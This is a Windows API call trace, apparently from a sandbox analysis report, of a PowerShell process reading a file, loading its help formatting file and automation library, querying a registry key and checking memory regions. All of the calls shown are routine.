	[0400.657] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.657] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.657] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.657] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.657] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.657] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.657] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.658] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.658] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.658] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.658] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.658] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0xf37, lpOverlapped=0x0) returned 1
	[0400.659] ReadFile (in: hFile=0x300, lpBuffer=0x3844667, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844667*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0400.659] ReadFile (in: hFile=0x300, lpBuffer=0x3844fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3844fc8*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0400.659] CloseHandle (hObject=0x300) returned 1
	[0400.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0400.659] SetErrorMode (uMode=0x1) returned 0x1
	[0400.659] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d060 | out: lpFileInformation=0x26d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0400.659] SetErrorMode (uMode=0x1) returned 0x1
	[0400.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0400.660] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d148 | out: phkResult=0x26d148*=0x300) returned 0x0
	[0400.660] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d0cc, lpData=0x0, lpcbData=0x26d0c8*=0x0 | out: lpType=0x26d0cc*=0x1, lpData=0x0, lpcbData=0x26d0c8*=0x56) returned 0x0
	[0400.660] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0400.660] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d09c, lpData=0x47ed70, lpcbData=0x26d098*=0x56 | out: lpType=0x26d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d098*=0x56) returned 0x0
	[0400.660] CoTaskMemFree (pv=0x47ed70) 
	[0400.660] RegCloseKey (hKey=0x300) returned 0x0
	[0400.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0400.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0400.670] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xef4d32bf, Data2=0xd984, Data3=0x4a32, Data4=([0]=0x8a, [1]=0x8, [2]=0xad, [3]=0x86, [4]=0x82, [5]=0xe6, [6]=0xdc, [7]=0x8b))) returned 0x0
	[0400.671] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xd7a684d8, Data2=0xb391, Data3=0x4ce5, Data4=([0]=0xad, [1]=0xca, [2]=0xb0, [3]=0x4f, [4]=0x85, [5]=0x3f, [6]=0x68, [7]=0xa9))) returned 0x0
	[0400.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.107] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xfe2ec8c2, Data2=0x4a22, Data3=0x49c1, Data4=([0]=0x91, [1]=0x43, [2]=0x3a, [3]=0xe0, [4]=0xe, [5]=0xaa, [6]=0x68, [7]=0xef))) returned 0x0
	[0401.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.502] VirtualQuery (in: lpAddress=0x26b380, lpBuffer=0x26c240, dwLength=0x30 | out: lpBuffer=0x26c240*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.503] VirtualQuery (in: lpAddress=0x26b410, lpBuffer=0x26c2d0, dwLength=0x30 | out: lpBuffer=0x26c2d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.504] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.506] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.507] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.507] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.508] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.508] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.508] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.508] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.509] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.509] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.509] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.509] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
